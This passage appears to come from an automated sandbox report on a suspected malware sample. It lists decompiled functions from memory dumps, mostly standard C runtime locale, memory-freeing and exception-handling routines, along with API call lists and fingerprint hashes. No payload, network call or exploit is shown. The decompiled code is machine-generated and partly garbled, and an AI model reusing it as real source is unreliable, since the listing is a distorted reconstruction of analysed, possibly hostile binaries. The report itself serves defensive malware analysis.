                                                          				_t164 = _t163 | E009B4CB1(_t139, __edi, _t163, _t174 - 8, 2, _t139, 0x3f, __edi + 0x138);
                                                          				_t165 = _t164 | E009B4CB1(_t139, __edi, _t164, _t174 - 8, 2, _t139, 0x40, __edi + 0x13c);
                                                          				_t166 = _t165 | E009B4CB1(_t139, __edi, _t165, _t174 - 8, 2, _t139, 0x41, __edi + 0x140);
                                                          				_t167 = _t166 | E009B4CB1(_t139, __edi, _t166, _t174 - 8, 2, _t139, 0x42, __edi + 0x144);
                                                          				_t168 = _t167 | E009B4CB1(_t139, __edi, _t167, _t174 - 8, 2, _t139, 0x43, __edi + 0x148);
                                                          				_t169 = _t168 | E009B4CB1(_t139, __edi, _t168, _t174 - 8, 2, _t139, 0x28, __edi + 0x14c);
                                                          				_t170 = _t169 | E009B4CB1(_t139, __edi, _t169, _t174 - 8, 2, _t139, 0x29, __edi + 0x150);
                                                          				_t171 = _t170 | E009B4CB1(_t139, __edi, _t170, _t174 - 8, 2, _t139, 0x1f, __edi + 0x154);
                                                          				_t172 = _t171 | E009B4CB1(_t139, __edi, _t171, _t174 - 8, 2, _t139, 0x20, __edi + 0x158);
                                                          				_t138 = E009B4CB1(_t139, __edi, _t172, _t174 - 8, 2, _t139, 0x1003, __edi + 0x15c) | _t172;
                                                          				return _t138;
                                                          			}

                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction ID: 095aece78304d225d391e1eee354350efbf9141cb11fa942de95b1040b824b20
                                                          • Opcode Fuzzy Hash: d5d5399395cc1563ab7bb71699b5c5c8bda82732998071ff11530a5c4ee30b2e
                                                          • Instruction Fuzzy Hash: 9381ECB7E4110C7AE72697F08D47FEABBACA704B40F404622F755E7082FAB4A65457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E009A2703(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                          				char _t153;
                                                          				void* _t167;
                                                          				void* _t180;
                                                          				void* _t187;
                                                          				char* _t192;
                                                          				intOrPtr* _t195;
                                                          				signed int _t198;
                                                          				signed int _t199;
                                                          				signed int _t200;
                                                          				signed int _t201;
                                                          				signed int _t202;
                                                          				signed int _t203;
                                                          				signed int _t204;
                                                          				signed int _t205;
                                                          				signed int _t206;
                                                          				signed int _t207;
                                                          				signed int _t208;
                                                          				signed int _t209;
                                                          				signed int _t210;
                                                          				signed int _t211;
                                                          				signed int _t212;
                                                          				signed int _t213;
                                                          				signed int _t214;
                                                          				signed int _t215;
                                                          				signed int _t216;
                                                          				signed int _t217;
                                                          				intOrPtr* _t218;
                                                          				char* _t220;
                                                          				void* _t221;
                                                          				void* _t222;
                                                          
                                                          				_t180 = __ebx;
                                                          				_t222 = _t221 + 1;
                                                          				asm("in al, dx");
                                                          				_push(1);
                                                          				_t198 = E009B4CB1(__ebx, __edi, __esi);
                                                          				_t199 = _t198 | E009B4CB1(__ebx, __edi, _t198, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
                                                          				_t200 = _t199 | E009B4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
                                                          				_t201 = _t200 | E009B4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
                                                          				 *((intOrPtr*)(_t222 - 0xc)) =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
                                                          				_t202 = _t201 | E009B4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x18,  *((intOrPtr*)(_t222 + 8)) + 0x1c);
                                                          				_t203 = _t202 | E009B4CB1(__ebx, __edi, _t202, _t222 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x20);
                                                          				_t204 = _t203 | E009B4CB1(__ebx, __edi, _t203, _t222 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x24);
                                                          				_t205 = _t204 | E009B4CB1(__ebx, __edi, _t204, _t222 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t222 + 8)) + 0x28);
                                                          				_t206 = _t205 | E009B4CB1(__ebx, __edi, _t205, _t222 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t222 + 8)) + 0x29);
                                                          				_t207 = _t206 | E009B4CB1(__ebx, __edi, _t206, _t222 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t222 + 8)) + 0x2a);
                                                          				_t208 = _t207 | E009B4CB1(__ebx, __edi, _t207, _t222 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t222 + 8)) + 0x2b);
                                                          				_t209 = _t208 | E009B4CB1(__ebx, __edi, _t208, _t222 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t222 + 8)) + 0x2c);
                                                          				_t210 = _t209 | E009B4CB1(__ebx, __edi, _t209, _t222 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t222 + 8)) + 0x2d);
                                                          				_t211 = _t210 | E009B4CB1(__ebx, __edi, _t210, _t222 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t222 + 8)) + 0x2e);
                                                          				_t212 = _t211 | E009B4CB1(__ebx, __edi, _t211, _t222 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t222 + 8)) + 0x2f);
                                                          				_t213 = _t212 | E009B4CB1(__ebx, __edi, _t212, _t222 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t222 + 8)) + 0x38);
                                                          				_t214 = _t213 | E009B4CB1(__ebx, __edi, _t213, _t222 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x3c);
                                                          				_t215 = _t214 | E009B4CB1(__ebx, __edi, _t214, _t222 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x40);
                                                          				_t216 = _t215 | E009B4CB1(__ebx, __edi, _t215, _t222 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x44);
                                                          				_t217 = _t216 | E009B4CB1(__ebx, __edi, _t216, _t222 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t222 + 8)) + 0x48);
                                                          				if((E009B4CB1(__ebx, __edi, _t217, _t222 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t222 + 8)) + 0x4c) | _t217) == 0) {
                                                          					_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0xc))));
                                                          					while( *_t192 != 0) {
                                                          						_t153 =  *_t192;
                                                          						if(_t153 < 0x30 || _t153 > 0x39) {
                                                          							if(_t153 != 0x3b) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t220 = _t192;
                                                          								do {
                                                          									 *_t220 =  *((intOrPtr*)(_t220 + 1));
                                                          									_t220 = _t220 + 1;
                                                          								} while ( *_t220 != 0);
                                                          								continue;
                                                          							}
                                                          							L19:
                                                          							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
                                                          								asm("lock xadd [eax], ecx");
                                                          								if(_t187 == 1) {
                                                          									E009B2248( *((intOrPtr*)(_t180 + 0x84)));
                                                          									E009B2248( *((intOrPtr*)(_t180 + 0x78)));
                                                          								}
                                                          							}
                                                          							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t222 - 4));
                                                          							_t167 = 0;
                                                          							 *((intOrPtr*)(_t180 + 0x80)) = _t195;
                                                          							 *((intOrPtr*)(_t180 + 0x84)) = _t218;
                                                          							goto L23;
                                                          						} else {
                                                          							 *_t192 = _t153 - 0x30;
                                                          							L8:
                                                          							_t192 = _t192 + 1;
                                                          						}
                                                          					}
                                                          					_t218 =  *((intOrPtr*)(_t222 + 8));
                                                          					_t195 =  *((intOrPtr*)(_t222 - 8));
                                                          					 *_t218 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
                                                          					 *((intOrPtr*)(_t218 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
                                                          					 *((intOrPtr*)(_t218 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
                                                          					 *((intOrPtr*)(_t218 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
                                                          					 *((intOrPtr*)(_t218 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t222 - 4)))) = 1;
                                                          					if(_t195 != 0) {
                                                          						 *_t195 = 1;
                                                          					}
                                                          					_t187 = 0xffffffffffffffff;
                                                          					if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
                                                          						asm("lock xadd [edx], eax");
                                                          					}
                                                          					goto L19;
                                                          				} else {
                                                          					E009B842D( *((intOrPtr*)(_t222 + 8)));
                                                          					E009B2248( *((intOrPtr*)(_t222 + 8)));
                                                          					E009B2248( *((intOrPtr*)(_t222 - 4)));
                                                          					E009B2248( *((intOrPtr*)(_t222 - 8)));
                                                          					_t167 = 1;
                                                          				}
                                                          				L23:
                                                          				return _t167;
                                                          			}


































                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85D9
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B85F0
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8607
                                                          • ___getlocaleinfo.LIBCMT ref: 009B861E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B863B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8652
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8669
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8680
                                                          • ___getlocaleinfo.LIBCMT ref: 009B869A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86B1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86C8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86DF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B86F9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8710
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8727
                                                          • ___getlocaleinfo.LIBCMT ref: 009B873E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8758
                                                          • ___getlocaleinfo.LIBCMT ref: 009B876F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B8786
                                                          • ___getlocaleinfo.LIBCMT ref: 009B879D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B87B7
                                                          • _free.LIBCMT ref: 009B87CD
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • _free.LIBCMT ref: 009B87D6
                                                          • _free.LIBCMT ref: 009B87DF
                                                          • _free.LIBCMT ref: 009B88A0
                                                          • _free.LIBCMT ref: 009B88A8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8448
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B845A
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B846C
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B847E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8490
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84A2
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84B4
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84C6
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84D8
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84EA
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B84FC
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B850E
                                                            • Part of subcall function 009B842D: _free.LIBCMT ref: 009B8520
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                                                          • String ID:
                                                          • API String ID: 129311744-0
                                                          • Opcode ID: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction ID: ec7e1f363432fbeafe564d2c9f603ed1537927bb5a0de419b043ff16894b443a
                                                          • Opcode Fuzzy Hash: 7b9dc03d4c7b8376b1ca75be350bb18c838d1f55d8d98acc1045b3e465f79b47
                                                          • Instruction Fuzzy Hash: 866113B2E402087AEB30DBA8CD46FEF7BEC9B48B85F144510FA44FB182D5A4DA509675
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E009A320D(void* __eax, void* __ebx, void* __ecx) {
                                                          				void* _t57;
                                                          
                                                          				_t57 = __ebx;
                                                          				asm("pushfd");
                                                          				 *((intOrPtr*)(__ebx + 0x75ff85f8)) =  *((intOrPtr*)(__ebx + 0x75ff85f8)) + __ecx;
                                                          				GetLastError();
                                                          			}




                                                          0x009a320d
                                                          0x009b5837
                                                          0x009b5838
                                                          0x009b583e

                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 009B583E
                                                          • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5855
                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B586B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B587A
                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B5887
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B588E
                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B589B
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58A2
                                                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58AF
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58B6
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58C7
                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58CE
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58D8
                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AddressEncodePointerProc$DebugDebuggerErrorLastLibraryLoadOutputPresentString
                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                          • API String ID: 1496758939-564504941
                                                          • Opcode ID: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction ID: c2a79641d0d773efffa66813ec8f0434c84026bd56148b6f04e428cfa15ca33c
                                                          • Opcode Fuzzy Hash: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction Fuzzy Hash: C211E470E1D302EBCB019BB1AD4CF6BBBBCAE857253550469F816D21A1DF34C800DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009BE8C3(short _a4, intOrPtr _a8) {
                                                          				short _t13;
                                                          				short _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				if(_t28 != 0 &&  *_t28 != 0 && E009BDB28(_t28, ?str?) != 0) {
                                                          					if(E009BDB28(_t28, ?str?) != 0) {
                                                          						return E009BEFC5(_t28);
                                                          					}
                                                          					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                                          						L9:
                                                          						return 0;
                                                          					}
                                                          					return _a4;
                                                          				}
                                                          				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                                          					goto L9;
                                                          				}
                                                          				_t13 = _a4;
                                                          				if(_t13 == 0) {
                                                          					return GetACP();
                                                          				}
                                                          				return _t13;
                                                          			}






                                                          APIs
                                                          • _wcscmp.LIBCMT ref: 009BE8DA
                                                          • _wcscmp.LIBCMT ref: 009BE8EB
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE907
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE931
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale_wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 1351282208-711371036
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009B1D88(struct _EXCEPTION_POINTERS* _a4) {
                                                          
                                                          				SetUnhandledExceptionFilter(0);
                                                          				return UnhandledExceptionFilter(_a4);
                                                          			}



                                                          0x009b1d8d
                                                          0x009b1d9d

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 009B1D8D
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 009B1D96
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 25%
                                                          			E009B9F55(intOrPtr* __ebx, void* __edx, void* __fp0, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				intOrPtr _t5;
                                                          				intOrPtr* _t6;
                                                          				int _t8;
                                                          
                                                          				_t5 =  *0x9d00d8; // 0x8a1365f9
                                                          				asm("popfd");
                                                          				 *__ebx =  *__ebx + __edx;
                                                          				_t6 = _t5 + 0x9ce400;
                                                          				if(_t6 == 0) {
                                                          					 *0x9d005c = _a4;
                                                          					_t8 = EnumSystemLocalesW(E009B9F41, 1);
                                                          					 *0x9d005c =  *0x9d005c & 0x00000000;
                                                          					return _t8;
                                                          				} else {
                                                          					return  *_t6(_a4, _a8, _a12, 0);
                                                          				}
                                                          			}







                                                          APIs
                                                          • EnumSystemLocalesW.KERNEL32(009B9F41,00000001,?,009BDCDD,009BDD7B,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 009B9F83
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2099609381-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,009B4E67,?,?,?,00000002), ref: 009BA002
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
